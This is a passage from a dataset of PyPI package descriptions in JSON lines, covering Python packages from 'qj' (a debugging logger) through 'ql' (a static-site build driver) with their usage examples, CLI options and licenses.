code will\nbe run. If your@propertygetter changes state, using this flag to print the\nobject's public API will change your object's state, which might make your\ndebugging job even harder. (Of course, you should never change state in a getter.)This is generally useful to quickly check the API of an unfamiliar object\nwhile working in a jupyter notebook.You can log some useful stats about x instead of its value withqj(arr, n=1):qj: some_func: arr, n=1 (shape (min (mean std) max) hist) <257>: ((100, 1), (0.00085, (0.46952, 0.2795), 0.97596), array([25, 14, 23, 23, 15]))This only works if the input (x) is a numeric numpy array or can be cast to one,\nand if numpy has already been imported somewhere in your code. Otherwise, the value\nofxis logged as normal.The log string is augmented with a key to the different parts of the logged value.The final value is a histogram of the array values. The number of histogram buckets\ndefaults to 5, but can be increased by passing an integer tongreater than 5:qj(arr, n=10)\n\nqj: some_func: arr, n=10 ...: (..., array([11, 14, 8, 6, 10, 13, 14, 9, 7, 8]))You can add atensorflow.Printcall toxwithy = qj(some_tensor, t=1):qj: some_func: some_tensor, t=1 <258>: Tensor(\"some_tensor:0\", ...)\nqj: Wrapping return value in tf.Print operation.And then later:sess.run(y)\n\nqj: some_func: some_tensor, t=1 <258>: [10 1] [[0.64550841]...Note that the Tensorflow output includes the shape of the tensor first ([10 1]),\nfollowed by its value. This only works if x is atf.Tensorobject andtensorflowhas already been imported somewhere in your code.The number of logs printed from thetf.Printcall isqj.MAX_FRAME_LOGS(describedbelow, defaults to 200) ift is True. Otherwise,\nit is set toint(t). Thus,t=1prints once, butt=Trueprints 200 times.You can also turn on numerics checking for anytf.Tensorwithy = qj(some_tensor, tfc=1):For example,log(0)is not a number:y = qj(tf.log(tensor_with_zeros), tfc=1)\n\nqj: some_func: tf.log(tensor_with_zeros), tfc=1 <258>: Tensor(\"Log:0\", ...)\nqj: Wrapping return value in tf.check_numerics.And then later:sess.run(y)\n\nInvalidArgumentError: qj: some_func: tf.log(tensor_with_zeros), tfc=1 <258> : Tensor had Inf valuesNote that tf.check_numerics is very slow, so you won't want to leave these in your graph.\nThis also only works if x is atf.Tensorobject andtensorflowhas already been\nimported somewhere in your code.You can override the return value of qj by passing any value tor:some_function(normal_arg, special_flag=qj(some_value, r=None))\n\nqj: some_func: some_value, r=None <272>: some flag value\nqj: Overridden return value: NoneAs in the example, this can be useful to temporarily change or turn off a\nvalue being passed to a function, rather than having to delete the value,\nwhich you might forget about.You can add timing logs to any function with@qj(time=1)orqj(foo, time=100):@qj(time=1)\ndef foo():\n ...\n\nqj: module_level_code: time=1 <343>: Preparing decorator to measure timing...\nqj: Decorating with timing function.\n\nfoo()\n\nqj: some_func: Average timing for across 1 call <343>: 0.0021 secondsNote that the log message is reported from the location of the call to the function that generated the message\n(in this case, line 343 insome_file.py, inside ofsome_func).Settingtimeto a larger integer value will report timing stats less freqently:foo = qj(foo, time=1000)\nfor _ in range(1000):\n foo()\n\nqj: some_func: foo, time=1000 <359>: \nqj: Wrapping return value in timing function.\nqj: some_func: Average timing for across 1000 calls <361>: 0.0023 secondsYou can catch exceptions and drop into the debugger with@qj(catch=1)orqj(foo, catch=):@qj(catch=1)\ndef foo(): raise Exception('FOO!')\n\nqj: module_level_code: catch=1 <371>: Preparing decorator to catch exceptions...\nqj: Decorating with exception function.\n\nfoo()\n\nqj: some_func: Caught an exception in <377>: FOO!\n> (377)()\n----> 1 foo()\n\nipdb>This can be particularly useful in comprehensions where you want to be able to inspect\nthe state of the comprehension that led to an exception:[qj(foo, catch=1)(x) for x in [1, 2, 3]]\n\nqj: some_func: foo, catch=1 <389>: \nqj: Wrapping return value in exception function.\nqj: some_func: Caught an exception in <389>: FOO!\n...\n> (389)()\n----> 1 [qj(foo, catch=1)(x) for x in [1, 2, 3]]\n\nipdb> x\n1Settingcatchwill always drop into the debugger when an exception is caught -- this feature\nis for debugging exceptions, not for replacing appropriate use oftry: ... except:.You can log all future calls to an object withqj(foo, log_all_calls=1):s = qj('abc', log_all_calls=1)\n\nqj: some_func: 'abc', log_all_calls=1 <380>: abc\nqj: Wrapping all public method calls for object.\n\ns.replace('a', 'b')\n\nqj: some_func: calling replace <385>: replace('a', 'b')\nqj: some_func: returning from replace <385>: bbcThis can break your code in a variety of ways and fail silently in other ways, but some problems\nare much easier to debug with this functionality. For example, figuring out why sequences of numbers\nfrom a seeded random number generator differ on different runs with the same seed:rng = qj(np.random.RandomState(1), log_all_calls=1)\n\nqj: some_func: np.random.RandomState(1), log_all_calls=1 <395>: \nqj: Wrapping all function calls for object.\n\nfor k in set(list('abcdefghijklmnop')):\n rng.randint(ord(k))\n\n# First run:\nqj: some_func: calling randint <413>: randint(97)\nqj: some_func: returning from randint <413>: 37\nqj: some_func: calling randint <413>: randint(99)\nqj: some_func: returning from randint <413>: 12\nqj: some_func: calling randint <413>: randint(98)\nqj: some_func: returning from randint <413>: 72\n...\n\n\n# Subsequent run with a reseeded rng:\nqj: some_func: calling randint <413>: randint(101)\nqj: some_func: returning from randint <413>: 9\nqj: some_func: calling randint <413>: randint(100)\nqj: some_func: returning from randint <413>: 75\nqj: some_func: calling randint <413>: randint(103)\nqj: some_func: returning from randint <413>: 5\n...This fails (in theory, but not as written) because sets are iterated in an undefined order.\nSimilar failures are possible with much more subtle structure. Comparing different series\nof log calls makes it very easy to find exactly where the series diverge, which gives a good\nchance of figuring out what the bug is.You can make particular log messages stand out withqj(foo, pad=):qj(foo, pad='#')\n\n##################################################\nqj: some_func: foo, pad='#' <461>: foo\n##################################################Similarly, add blank lines:qj(foo, pad=3)\n\n# Some other log message...\n\n\n\nqj: some_func: foo, pad=3 <470>: foo\n\n\n\n# The next log message...Parameters:There are seven global parameters for controlling the logger:qj.LOG: Turns logging on or off globally. Starts out set to True, so\nlogging is on.qj.LOG_FN: Which log function to use. All log messages are passed to this\nfunction as a fully-formed string, so the only constraints are\nthat this function takes a single parameter, and that itisa function -- e.g., you can't setqj.LOG_FN = printunless\nyou are usingfrom __future__ import print_function(although\nyou can define your own log function that just calls print if\nyou don't like the default). Defaults tologging.infowrapped\nin a lambda to support colorful logs.qj.STR_FN: Which string conversion function to use. All objects to be logged\nare passed to this function directly, so it must take an arbitrary\npython object and return a python string. Defaults tostr, but a\nnice override ispprint.pformat.qj.MAX_FRAME_LOGS: Limits the number of times per stack frame the logger\nwill print for each qj call. If the limit is hit, it\nprints an informative message after the last log of the\nframe. Defaults to 200.qj.COLOR: Turns colored log output on or off globally. Starts out set to\nTrue, so colorized logging is on.qj.PREFIX: String that all qj logs will use as a prefix. Defaults to'qj: '.qj.DEBUG_FN: Which debugger to use. You shouldn't need to set this in most\nsituations. The function needs to take a single argument, which\nis the stack frame that the logger should start in. If this is\nnot set, then the first time debugging is requested, qj attempts\nto load ipdb. If ipdb isn't available, it falls back to using pdb.\nIn both cases,qj.DEBUG_FNis set to the respectiveset_tracefunction in a manner that supports setting the stack frame.Global Access:In many cases when debugging, you need to dive into many different files\nacross many different modules. In those cases, it is nice to have a single\nlogging and debugging interface that is immediately available in all of the\nfiles you touch, without having to import anything additional in each file.To support this use case, you can call the following function after importing\nin one file:from qj import qj\nqj.make_global()This will add qj to python's equivalent of a global namespace, allowing you\nto call qj from any python code that runs after the call toqj.make_global(), no matter what file or module it is in.When using qj from a jupyter notebook, qj.make_global() is automatically called\nwhen qj is imported.As described inBasic Usage, you can also just use:from qj_global import qjThis is generally what you want, but qj does not force you to pollute the global\nnamespace if you don't want to (except in jupyter notebooks).qj Magic Warning:qj adds a local variable to the stack frame it is called from. That variable is__qj_magic_wocha_doin__. If you happen to have a local variable with the same\nname and you call qj, you're going to have a bad time.Testing:qj has extensive tests. You can run them with nosetests:$ nosetests\n........................................................................................\n----------------------------------------------------------------------\nRan 88 tests in 1.341s\n\nOKOr you can run them directly:$ python qj/tests/qj_test.py\n........................................................................................\n----------------------------------------------------------------------\nRan 88 tests in 1.037s\n\nOKIf you have both python 2.7 and python 3.6+ installed, you can test both versions:$ nosetests --where=qj/tests --py3where=qj/tests --py3where=/qjtests3\n$ python3 qj/tests/qj_test.py\n$ python3 qj/tests3/qj_test.pyDisclaimer:This project is not an official Google project. It is not supported by Google\nand Google specifically disclaims all warranties as to its quality,\nmerchantability, or fitness for a particular purpose.Contributing:See how tocontribute.License:Apache 2.0."} +{"package": "qjam", "pacakge-description": "No description available on PyPI."} +{"package": "qjdltools", "pacakge-description": "Some usefull tools for deep learning.\nAuthor: QiJi"} +{"package": "qjer", "pacakge-description": "ngwer 11 04 lyg"} +{"package": "qjob", "pacakge-description": "qjobUtility to split shell commands into jobs, then submit them for computation to a queue of a SGE or Slurm cluster.Seehttps://qjob.readthedocs.io/"} +{"package": "qjobs", "pacakge-description": "qjobsqjobs is an attempt to get a cleaner and more customizable output than the one\nprovided by qstat (Sun Grid Engine).Quick installationqjobsis available on PyPI. It is compatible with Python3.6 and higher.Installation ofqjobscan be done withpip:python3 -m pip install -U --user qjobsThat\u2019s it! If the directory where pip installs packages (usually~/.local/bin) is in yourPATHenvironment variable, you only have to\nrunqjobsfrom the command line to launch the wrapper. Enjoy!"} +{"package": "qjoin", "pacakge-description": "qjoinqjoin is a data manipulation library that provides simple and efficient joining and collection processing functionality. It simplifies and optimizes the process of joining different entities and provides methods for aggregating, organizing, and sorting data.qjoin is a simple and efficient way to join and process dataqjoin is a steroid extension of thezipfunction in pythonqjoin works on all iterators, whether lists of dictionaries, objects or sqlalchemy or django modelsProject linksPyPI ReleasesDocumentationSource codeIssue trackerChatInstallationpipinstallqjoinUsageHere are examples of how qjoin will be used in the future.# Basic usageqjoin.on(persons).join(cities,key=\"city\").all()person_infos=qjoin.on(persons).join(cities,left=\"city\",right=\"city\").all()forperson,cityinperson_infos:print(f'{person}-{city}')person_infos=qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.all()forperson,city,carinperson_infos:print(f'{person}-{city}-{car}')# Advanced transformationqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.as_aggregate(Aggregate,['person','city','cars'])TODOThe following syntaxes are to be implemented and documented. You want to discuss it, participate or suggest other syntaxes, join us ondiscord.# Advanced transformationqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.as_aggregate(Aggregate,lambdap,ci,ca:Aggregate(p,ci,ca))qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.as_lookup(lambdap:p.name)qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.as_multilookup(lambdap,c:c.city)# Advancedqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city,scan_strategy=qjoin.RIGHT_LOOKUP).join(cars,left=lambdap:p.car,right=lambdac:c.car,default=Car(car='unknown',constructor='unknown'))\\.as_aggregate(Aggregate,lambdap,ci,ca:Aggregate(p,ci,ca))Try with dockerYou can run this template with docker. The manufactured image can be distributed and used to deploy your application to a production environment.docker-composebuild\ndocker-composerunappTry with gitpodgitpodcan be used as an IDE. You can load the code inside to try the code.The latest versionYou can find the latest version to ...gitclonehttps://github.com/FabienArcellier/qjoin.gitContributingIf you want to discuss about it, contact us throughdiscordContributing to this project is done through merge request (pull request in github). You can contribute to this project by discovering bugs, opening issues or submitting merge request.more inCONTRIBUTING.mdLicenseMIT LicenseCopyright (c) 2023-2023 Fabien ArcellierPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qjqqjq", "pacakge-description": "An feature extraction algorithm, improve the FastICA"} +{"package": "qjson", "pacakge-description": "qjson=====quick and dirty way to convert json string to python object.# install`$pip install qjson`orjust copy the qjson/qjson.py to your project.#usage```pythonimport qjsonjson_str = '{\"person\":\\{\"name\":\"jerry\", \"age\":32, \"web\":{\"url\":\"http://jatsz.org\", \"desc\":\"blog\"}}, \\\"grade\": \"a\", \"score\":[80,90]}'info = qjson.loads(json_str)assert info.person.name == \"jerry\"assert info.grade == \"a\"assert info.score == [80, 90]```-0.1.8:fix array as top element, which also has object within it.-0.1.8:supporting array has object as element."} +{"package": "qjson2json", "pacakge-description": "qjson to json converterjsonis a very popular data encoding with a good support in many\nprogramming languages. It may thus seam a good idea to use it for manually managed\ndata like configuration files. Unfortunately, json\u00a0is not very convenient for such\napplication because every string must be quoted and elements must be separated by commas.\nIt is easy to parse by a program and to verify that it is correct, but it\u2019s not connvenient\nto write.For this reason, different alternatives to json have been proposed which are more human\nfriendly like [yaml] orhjsonfor instance.qjson\u00a0is inspired by hjson by being a human readable and extended json. The difference\nbetween qjson and hjson is that qjson extends its functionality and relax some rules.Here is a list of qjson text properties:comments of the form //... #... or /.../commas between array values and object members are optionaldouble quote, single quote and quoteless stringsnon-breaking space is considered as a white space characternewline is \\n or \\r\\n, report \\r alone or \\n\\r as an errornumbers are integer, floating point, hexadecimal, octal or binarynumbers may contain underscore '_' as separatornumbers may be simple mathematical expression with parenthesismember identifiers may be quoteless strings including spacesthe newline type in multiline string is explicitely specifiedbackspace and form feed controls are invalid characters except\nin /.../ comments or multiline stringstime durations expressed with w, d, h, m, s suffix are converted to secondstime specified in ISO format is converted to UTC time is secondsUsageInstall the qjson to json converter package with the commandpython3 -m pip install qjson2jsonOnced installed, it can be used.$python3\n>>> import qjson2json\n>>> qjson2json.decode('a:b')\n'{\"a\":\"b\"}'Reliabilityqjson2json is a python extension using the C library qjson-c.\nqjson-c is a direct translation of qjson-go that has been extensively tested\nwith manualy defined tests (100% coverage). AFL fuzzing was run on qjson-c\nfor many months without finding a simple hang or crash. For this fuzzing test,\nthe json text produced, when the input was valid, was checked with json-c to\ndetect invalid json. All json output in the tests are valid json.This code should thus not crash or hang your program, and json output is valid.\nWhat could not be extensively and automatically tested is if the output is\nthe expected output. It was only verified in the manual tests of qjson-go.For bug reports in this qjson2json package, fill an issue inthe qjson-py3 project.Contributingqjson\u00a0is a recently developped package. It is thus a good time to\nsuggest changes or extensions to the syntax since the user base is very\nsmall.For suggestions or problems relative to syntax, fill an issue in theqjson-syntax project.Any contribution is welcome.LicenseThe licences is the 3-BSD clause."} +{"package": "qk", "pacakge-description": "No description available on PyPI."} +{"package": "qkcli", "pacakge-description": "qkcliQuick-CLI is a simple library that helps the creation of CLI applications."} +{"package": "qKDB", "pacakge-description": "qKDB is a python interface for KX system database KDB+"} +{"package": "qkmd", "pacakge-description": "qkmdQuick markdown what you need, just via a link.Getting StartedHave you ever try to stored the link(URL) in.txtto browse it one day later or few months after? But when you open the file again, muttering to yourself 'What do I store for this?'Have you learnmarkdownsyntax, but get bored to use it to record the link(URL) by press the[]and()?Theqkmdis for you, you can just give it a link(URL) then the webpage title will be extract, format to a[title](http://example.com)pattern. Also you can customize the title what you like, append timestamp, append code snip ...PrerequisitesIf you live in theresource blocked areaorInternet censorship area, please consider setting a proxy first.Install the porxy software, assure you can use browser to open the webpageInstallpolipo$## Ubuntu / Debian$sudoapt-getupdate\n$sudoapt-getinstallpolipo$## redhat / CentOSPolipo installation instructionsExport the proxyexporthttps_proxy=http://127.0.0.1:8123exporthttp_proxy=http://127.0.0.1:8123Theqkmddefault proxy port number is 8123.InstallingAssure you python version is >= 3.4$pipinstallqkmdor$python3setup.pyinstallor$pythonsetup.pyinstallUsageusage: qkmd.py [-h] [-d] [-v] [-c [comment [comment ...]]] [-l language]\n [-s source-code-file] [-C] [-t [title [title ...]]]\n [-o output-file] [-P]\n [link]\n\nQuickly formatting markdown `link`, convenient your daily life/work.\n\npositional arguments:\n link generate the markdown format link\n\noptional arguments:\n -h, --help show this help message and exit\n -d, --date append `RFC 2822` date format\n -v, --version display current version of `qkmd`\n -c [comment [comment ...]], --comment [comment [comment ...]]\n give the link a simple comment\n -l language, --language language\n specific the code language\n -s source-code-file, --source source-code-file\n give the source code snip file\n -C, --color source code syntax hightline\n -t [title [title ...]], --title [title [title ...]]\n add title manually\n -o output-file, --save output-file\n save the markdown to a file\n -P, --print turn off print the markdown format in screenHere is a simple way to reduce your time and simplify your operation.Assure you always want to store the file to$HOME/mark.mdand highlight the codealiasmark='function mark(){ qkmd $* -o ~/mark.md -C;}; mark'Authorsalopex cheung@alopexLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qkogpt", "pacakge-description": "quantization"} +{"package": "qk-pub", "pacakge-description": "No description available on PyPI."} +{"package": "qksh", "pacakge-description": "f5 qksh================Introduction------------This project implements an SDK for the iControl REST interface for BIG-IP\u00ae.Users of this library can create, edit, update, and delete configuration objectson a BIG-IP\u00ae.This project implements an utility for interacting with F5 iHealth. Users ofthis utility can upload qkview, download log file, config file and commandoutput from an iHealth link.Installation------------.. code:: shell$> pip install qkshUsage-----.. code:: pythonqksh qksh 1-12345678 test-1.qkview test-2.qkviewqksh qksh https://ihealth.f5.com/qkview-analyzer/qv/1234567/files/download/Y29uZmlnL2JpZ2lwLmNvbmYDocumentation-------------Documentation is hosted on `Read the Docs `_Filing Issues-------------See the Issues section of `Contributing `__.Contributing------------See `Contributing `__Test----Before you open a pull request, your code must have passing`pytest `__ unit tests. In addition, you shouldinclude a set of functional tests written to use a real BIG-IP devicefor testing. Information on how to run our set of tests is includedbelow.Unit Tests~~~~~~~~~~We use pytest for our unit tests.#. If you haven't already, install the required test packages listed inrequirements.test.txt in your virtual environment... code:: shell$ pip install -r requirements.test.txt#. Run the tests and produce a coverage report. The ``--cov-report=html`` willcreate a ``htmlcov/`` directory that you can view in your browser to see themissing lines of code... code:: shellpy.test --cov ./qksh --cov-report=htmlopen htmlcov/index.htmlStyle Checks~~~~~~~~~~~~We use the hacking module for our style checks (installed as part of step 1 inthe Unit Test section)... code:: shell$ flake8 ./Contact-------abc89d@gmail.comLicense-------The MIT License (MIT)~~~~~~~~~~~Permission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the \"Software\"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included inall copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISINGFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGSIN THE SOFTWARE."} +{"package": "qky-tools", "pacakge-description": "python tools collection"} +{"package": "ql", "pacakge-description": "quillquill is the \"driver\" forspin.systems,\nand packaged on PyPi asql.A more detailed description of the package namespace can be found below,\nbut for everyday usage the commands needed are:importquillasqlql.ssm.check_manifest()# Check all component repos' statusql.ssm.repos_df# print the summary dataframeql.fold.wire.standup()# build or rebuild any 'wire' module MMD documents as HTML pagesql.fold.cut.standup()# build or rebuild any 'cut' module Jinja templates as HTML pagesql.remote_push_manifest()# Add/commit/push any dirty repos, triggering CI buildThe last step will also rebuild any sites which have dirty repos (to avoid content partially falling behind,\nwhen for instance the templates for a site are changed).Structureql\u2836scan: Read.mmdfilesscan\u2836lever: Parse.mmdfile formatql\u2836manifest: Readspin.systemsconfigurationql\u2836fold: Manage*.spin.systemssubdomainsfold\u2836address: Manage subdomain address shorthandfold\u2836wire: Emit HTML websites from.mmdfilesfold\u2836cut: Emit HTML websites from.htmlJinja templates and.mdfilesHelper CLINote: for reasons unknown, thedefoptCLI only works on 3.10+Installation adds aqlcommand (for deployment) andcyl(for local preview).\nThese two commands handle repo-internal and -external output of generated sites respectively\n(cylcurrently only for thefold.cutmodule, notfold.wire,\nso not yet sufficient to replace in the CI pipeline).usage: ql [-h] [-d [DOMAINS_LIST ...]] [--incremental] [-n] [-r] [-w] [-v]\n [-g] [--internal | --no-internal] [--version]\n\nConfigure input filtering and output display.\n\noptions:\n -h, --help show this help message and exit\n -d [DOMAINS_LIST ...], --domains-list [DOMAINS_LIST ...]\n Names of the subdomains to build.\n (default: None)\n --incremental compute MD5 checksums for each of the generated files.\n (default: False)\n -n, --no-render Dry run mode.\n (default: False)\n -r, --recheck Only regenerate files whose input checksum has changed since the last\n incremental run.\n (default: False)\n -w, --watch Rebuild the domains continuously (incompatible with incremental/recheck).\n (default: False)\n -v, --verbose Whether to announce what tasks are being carried out.\n (default: False)\n -g, --gitlab-ci Source the manifest repos (i.e. git pull them) and then stash\n the changes after building, switch to the www branch, pop the\n stash and push the changes (i.e. publish the website content).\n (default: False)\n --internal, --no-internal\n Whether to build sites internal (ql) or external (cyl,\n not including 'fold.wire') to the repo.\n (default: True)\n --version show program's version number and exitSo for example:cyl-dporePopulates~/spin/cyl/porewith thecutmodule's portion ofpore.spin.systemsIncremental builds, rechecking, and watchingTowards the goal of implementing an incremental build system on CI, quill has 2 extra modes:anincrementalbuild mode: where in addition to building the entire site (or domain list),\nMD5 checksums are computed for each of the generated files. In this mode, thebuild auditeris activated,\nand stores a log as it generates the templates. Use the-iflag when you want to recreate the\ninventory of template MD5 hashes.To run a build for the same domain as above, in incremental mode, run:cyl-dpore-iarecheckbuild mode: a subset of incremental builds in which only files whose input checksum\nhas changed since the last incremental run are regenerated. This makes the build substantially faster\nas there is a reduced scope of templates to transform. Use the-rflag (alongside-i) when you\nwant to double check only the files in the template hash inventory and only regenerate what differs on disk.To run a recheck afterwards, and only build any files that changed in between builds, run:cyl-dpore-i-rawatchbuild mode: incompatible with incremental/recheck, this is for continuously rebuilding\n(incremental mode is designed for repeated use, like on an incremental build system). Use the-wflag when you want to have the page rebuild automatically in the background.Watching is incompatible with incremental mode, but rebuilds following changes to a file.The corresponding command to the ones above would be:cyl-dpore-wUsage memoRequires directory of static site repositories at\nlocation specified inspin.ini(by default\nthis is as a sibling directory../ss/), containing\na filemanifest.mmdbeginning with the apex domain and\nimmediately followed by a subdomain list.Below is a demo of accessing thespin.systemsmanifest file\n(ssm) which implements theMMDclass, subclassingDoc,\nwhich parses the file contents in a structured way (specifically,\nas a list of colon-separated values).>>>frompprintimportpprint>>>fromquillimportssm>>>importpandasaspd>>>ssmParsedMMDfile(Documentof1block,containing1list)>>>ssm.listHeaderedlistwith16items>>>pprint(ssm.list.all_nodes)[-spin.systems:spin-systems:masterwww:,-:cal:qu-cal:masterwww,-,:log:spin-log:masterwww,-,:conf:qu-conf:masterwww,-,:pore:qu-pore:masterwww,-,:ocu:naiveoculus:masterwww,-,:arc:appendens:masterwww,-,:qrx:qu-arx:masterwww,-,:erg:spin-erg:masterwww,-,:opt:spin-opt:masterwww,-,:poll:qu-poll:masterwww,-,:arb:spin-arb:masterwww,-,:reed:qu-reed:masterwww,-,:noto:qu-noto:masterwww,-,:plot:qu-plot:masterwww,-,:doc:spin-doc:masterwww,-,:labs:qu-labs:masterwww]Similarlyssm.list.nodesgives just the subdomains, andssm.list.headergives the main site\ndomain.>>>ssm.list.header-spin.systems:spin-systems:>>>ssm.list.header.parts['spin.systems','spin-systems','master www']>>>ssm.list.nodes[0].parts['cal','qu-cal','master www']>>>ssm.list.nodes[1].parts['log','spin-log','master www']>>>ssm.list.nodes[2].parts['conf','qu-conf','master www']>>>pprint(ssm.all_parts)[['spin.systems','spin-systems','master www'],['cal','qu-cal','master www'],['log','spin-log','master www'],['conf','qu-conf','master www'],['pore','qu-pore','master www'],['ocu','naiveoculus','master www'],['arc','appendens','master www'],['qrx','qu-arx','master www'],['erg','spin-erg','master www'],['opt','spin-opt','master www'],['poll','qu-poll','master www'],['arb','spin-arb','master www'],['reed','qu-reed','master www'],['noto','qu-noto','master www'],['plot','qu-plot','master www'],['doc','spin-doc','master www'],['labs','qu-labs','master www']]>>>ssm.as_df()domainrepo_namebranches0spin.systemsspin-systemsmasterwww1calqu-calmasterwww2logspin-logmasterwww3confqu-confmasterwww4porequ-poremasterwww5ocunaiveoculusmasterwww6arcappendensmasterwww7qrxqu-arxmasterwww8ergspin-ergmasterwww9optspin-optmasterwww10pollqu-pollmasterwww11arbspin-arbmasterwww12reedqu-reedmasterwww13notoqu-notomasterwww14plotqu-plotmasterwww15docspin-docmasterwww16labsqu-labsmasterwwwThis is just for review purposes currently, and any further info can be added as long\nas all the lines (\"nodes\") have the same number of colon-separated values.The manifest is parsed inmanifest\u2836parsingbyparse_man_nodewhich is wrapped intossm.repos,\nwhich will print out the repos' git addresses for each CNAME domain or subdomain:('spin.systems', 'git@gitlab.com:spin-systems/spin-systems.gitlab.io.git')\n('cal', 'git@gitlab.com:qu-cal/qu-cal.gitlab.io.git')\n('log', 'git@gitlab.com:spin-log/spin-log.gitlab.io.git')\n('conf', 'git@gitlab.com:qu-conf/qu-conf.gitlab.io.git')\n('pore', 'git@gitlab.com:qu-pore/qu-pore.gitlab.io.git')\n('ocu', 'git@gitlab.com:naiveoculus/naiveoculus.gitlab.io.git')\n('arc', 'git@gitlab.com:appendens/appendens.gitlab.io.git')\n('qrx', 'git@gitlab.com:qu-arx/qu-arx.gitlab.io.git')\n('erg', 'git@gitlab.com:spin-erg/spin-erg.gitlab.io.git')\n('opt', 'git@gitlab.com:spin-opt/spin-opt.gitlab.io.git')\n('poll', 'git@gitlab.com:qu-poll/qu-poll.gitlab.io.git')\n('arb', 'git@gitlab.com:spin-arb/spin-arb.gitlab.io.git')\n('reed', 'git@gitlab.com:qu-reed/qu-reed.gitlab.io.git')\n('noto', 'git@gitlab.com:qu-noto/qu-noto.gitlab.io.git')\n('plot', 'git@gitlab.com:qu-plot/qu-plot.gitlab.io.git')\n('doc', 'git@gitlab.com:spin-doc/spin-doc.gitlab.io.git')\n('labs', 'git@gitlab.com:qu-labs/qu-labs.gitlab.io.git')as well as a DataFrame which is modified by theql.ssm.check_manifest()to include 'live' views on\nthe repos (note that this method takes aadd_before_check=Trueargument, which controls whethergit add --allis run on each repo to check if it's 'dirty').>>>ssm.repos_dfdomainrepo_namebranchesgit_url0spin.systemsspin-systemsmasterwwwgit@gitlab.com:spin-systems/spin-systems.gitlab.io.git1calqu-calmasterwwwgit@gitlab.com:qu-cal/qu-cal.gitlab.io.git2logspin-logmasterwwwgit@gitlab.com:spin-log/spin-log.gitlab.io.git3confqu-confmasterwwwgit@gitlab.com:qu-conf/qu-conf.gitlab.io.git4porequ-poremasterwwwgit@gitlab.com:qu-pore/qu-pore.gitlab.io.git5ocunaiveoculusmasterwwwgit@gitlab.com:naiveoculus/naiveoculus.gitlab.io.git6arcappendensmasterwwwgit@gitlab.com:appendens/appendens.gitlab.io.git7qrxqu-arxmasterwwwgit@gitlab.com:qu-arx/qu-arx.gitlab.io.git8ergspin-ergmasterwwwgit@gitlab.com:spin-erg/spin-erg.gitlab.io.git9optspin-optmasterwwwgit@gitlab.com:spin-opt/spin-opt.gitlab.io.git10pollqu-pollmasterwwwgit@gitlab.com:qu-poll/qu-poll.gitlab.io.git11arbspin-arbmasterwwwgit@gitlab.com:spin-arb/spin-arb.gitlab.io.git12reedqu-reedmasterwwwgit@gitlab.com:qu-reed/qu-reed.gitlab.io.git13notoqu-notomasterwwwgit@gitlab.com:qu-noto/qu-noto.gitlab.io.git14plotqu-plotmasterwwwgit@gitlab.com:qu-plot/qu-plot.gitlab.io.git15docspin-docmasterwwwgit@gitlab.com:spin-doc/spin-doc.gitlab.io.git16labsqu-labsmasterwwwgit@gitlab.com:qu-labs/qu-labs.gitlab.io.git>>>ssm.check_manifest()domainrepo_namebranchesgit_urlbranchlocalclean0spin.systemsspin-systemsmasterwwwgit@gitlab.com:spin-systems/spin-systems.gitlab.io.gitwwwTrueTrue1calqu-calmasterwwwgit@gitlab.com:qu-cal/qu-cal.gitlab.io.gitwwwTrueTrue2logspin-logmasterwwwgit@gitlab.com:spin-log/spin-log.gitlab.io.gitwwwTrueTrue3confqu-confmasterwwwgit@gitlab.com:qu-conf/qu-conf.gitlab.io.gitwwwTrueTrue4porequ-poremasterwwwgit@gitlab.com:qu-pore/qu-pore.gitlab.io.gitwwwTrueTrue5ocunaiveoculusmasterwwwgit@gitlab.com:naiveoculus/naiveoculus.gitlab.io.gitwwwTrueTrue6arcappendensmasterwwwgit@gitlab.com:appendens/appendens.gitlab.io.gitwwwTrueTrue7qrxqu-arxmasterwwwgit@gitlab.com:qu-arx/qu-arx.gitlab.io.gitwwwTrueTrue8ergspin-ergmasterwwwgit@gitlab.com:spin-erg/spin-erg.gitlab.io.gitwwwTrueTrue9optspin-optmasterwwwgit@gitlab.com:spin-opt/spin-opt.gitlab.io.gitwwwTrueTrue10pollqu-pollmasterwwwgit@gitlab.com:qu-poll/qu-poll.gitlab.io.gitmasterT